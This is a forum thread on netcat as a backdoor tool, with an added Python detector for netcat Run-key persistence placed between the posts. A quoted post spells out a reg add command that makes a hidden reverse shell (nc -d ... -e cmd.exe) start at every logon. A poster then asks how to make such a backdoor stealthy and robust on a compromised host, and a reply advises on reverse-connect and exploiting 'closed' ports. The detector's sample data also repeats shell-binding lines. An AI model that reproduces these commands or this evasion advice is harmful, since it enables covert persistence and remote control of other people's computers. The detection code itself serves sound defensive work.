Thread: NetCat - The Swiss Army Knife

  1. #11
    Quote Originally Posted by D4rk357
    2. Executing the back door using a Registry Entry

    The back door would be triggered when the user logs on to the system.
    Add the registry key like the following from the command prompt:

    c:\> reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v netcat /t REG_SZ /d "c:\<path>\nc.exe -d <IP_for_reverse_connect> <remote_port> -e cmd.exe"

    As stated, the back door would be executed when someone logs into the system and you would leverage his "privilege", i.e. you could have a normal user's privilege or an administrator's, depending on the privilege of the user logging in.

    Drawback: If the shell has been lost, you have to wait for the user to log off and log in again to trigger the back-door connection.

    Hello everyone, this is my first post on this forum. I didn't consider myself a newbie until I came here.

    Well, this is a newbish question to be honest, but I am working on a netcat 'backdoor' project to find the most stealthy and robust solution to a netcat backdoor on a host (a personal computer host, not a server).

    The context of this security issue is the attacker has already compromised the system via remote access and will leave a backdoor in the event their trojan is cleaned.

    So everyone knows the simple backdoor with netcat, but what are the main problems regarding the stealth and robustness of the solution?

    1- There may be a lack of port forwarding from router to local host.
    2- The firewall protection may be extremely tight.
    3- The computer may have a dynamic IP assigned every few days.

    1- Manually open desired port prior to setting backdoor. Problem: could be obvious to admin.
    2- Add netcat to safe programs list (to avoid alert). Problem: may not have admin rights to do this.
    3- Install flexible DNS server like no-ip OR reverse connect. Problem: starting to add to audit trail.

    Can anyone help me here address these issues to produce the most stealthy and robust backdoor solution possible with netcat?
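From the defender's side, the persistence described in the quoted post leaves a very recognisable trace: a Run-key value whose data launches a netcat binary with `-e`/`--exec` handing a shell to the remote end, usually with `-d` so no console window appears. The script below is an added example (not code from this thread or its posters) that scans the text printed by `reg query` on the HKLM Run key for exactly that pattern. The registry dump it works on is constructed for the example; the value names, paths and the 203.0.113.10 address are made up, and the list of netcat binary names is an assumption about common filenames, not an exhaustive one.

```python
import re
from dataclasses import dataclass, field

# Constructed sample of what `reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run`
# prints on a host where a Run-key back door like the one in the quoted post was added.
# Value names, paths and the 203.0.113.10 address are invented for this example.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    netcat    REG_SZ    c:\tools\nc.exe -d 203.0.113.10 4444 -e cmd.exe
    OneDrive    REG_SZ    "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    Updater    REG_SZ    C:\ProgramData\svc\ncat.exe 203.0.113.10 443 --exec powershell.exe
"""

# Filenames netcat builds commonly ship under on Windows (assumption, extend as needed).
NETCAT_NAMES = {"nc.exe", "nc64.exe", "ncat.exe", "netcat.exe"}
# Programs that "-e" / "--exec" would hand to the remote end.
SHELLS = {"cmd.exe", "cmd", "powershell.exe", "powershell", "pwsh.exe"}

# `reg query` separates value name, type and data with runs of four or more spaces.
VALUE_RE = re.compile(r"^\s+(?P<name>.+?)\s{4,}(?P<type>REG_\w+)\s{4,}(?P<data>.*)$")
KEY_RE = re.compile(r"^HKEY_[A-Z_]+\\")


@dataclass
class Finding:
    key: str
    name: str
    data: str
    reasons: list = field(default_factory=list)


def tokens_of(data: str) -> list:
    """Split a command line into tokens, keeping double-quoted paths together."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', data)]


def inspect_value(key: str, name: str, data: str):
    """Return a Finding if this Run-key value looks like a netcat shell back door."""
    toks = tokens_of(data)
    if not toks:
        return None
    reasons = []
    # First token is the program; compare its basename against known netcat names.
    exe = toks[0].replace("/", "\\").rsplit("\\", 1)[-1].lower()
    is_netcat = exe in NETCAT_NAMES
    if is_netcat:
        reasons.append(f"launches netcat binary {exe}")
    lowered = [t.lower() for t in toks]
    # "-e cmd.exe" (nc) or "--exec powershell.exe" (ncat) binds a shell to the socket.
    for i, t in enumerate(lowered):
        if t in ("-e", "--exec") and i + 1 < len(lowered) and lowered[i + 1] in SHELLS:
            reasons.append(f"binds a shell to the connection ({toks[i]} {toks[i + 1]})")
    # "-d" detaches nc from the console so the user sees no window; only meaningful for netcat.
    if is_netcat and "-d" in lowered:
        reasons.append("-d detaches from the console (no visible window)")
    return Finding(key, name, data, reasons) if reasons else None


def scan_reg_query_output(text: str) -> list:
    """Parse `reg query` text and return findings, tagged with the key they live under."""
    findings = []
    key = ""
    for line in text.splitlines():
        if KEY_RE.match(line):
            key = line.strip()
            continue
        m = VALUE_RE.match(line)
        if not m:
            continue
        f = inspect_value(key, m["name"], m["data"])
        if f:
            findings.append(f)
    return findings


if __name__ == "__main__":
    for f in scan_reg_query_output(SAMPLE_REG_QUERY):
        print(f"{f.key}\\{f.name}: {f.data}")
        for r in f.reasons:
            print("   -", r)
```

Feed it real output with `reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run > run.txt` and read the file in place of `SAMPLE_REG_QUERY`; the same parser works for the HKCU Run key, which the quoted post does not mention but which an unprivileged user can write to. Since the command line in the Run value is plain text, a renamed binary would slip past the name check, which is why the shell-binding check is kept independent of the filename.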

  2. #12
    b0nd
    Hi Cheatson,

    The netcat scenario you have highlighted is for "reverse-connect" and bypasses all the issues highlighted by you.

    Regarding opening a new port - it might or might not help in case of direct-connect, as has been stated by you, because of NATing and port forwarding issues. Here sometimes luck favors you if you find a "closed" port on the server while performing port scanning from outside the network, from the cloud.
    Mind it, "closed" and "filtered" are quite different, and you can simply run netcat on a "closed" port, making it "open" and accessible from the cloud without worrying about port forwarding and all, as that has already been done by the n/w admin for you while "mis-configuring" the network.

    Feel free to discuss further if needed.

    [*] To follow the path: look to the master, follow the master, walk with the master, see through the master,
    ------> become the master!!! <------
    [*] Everyone has a will to WIN but very few have the will to prepare to WIN
    [*] Invest yourself in everything you do, there's fun in being serious
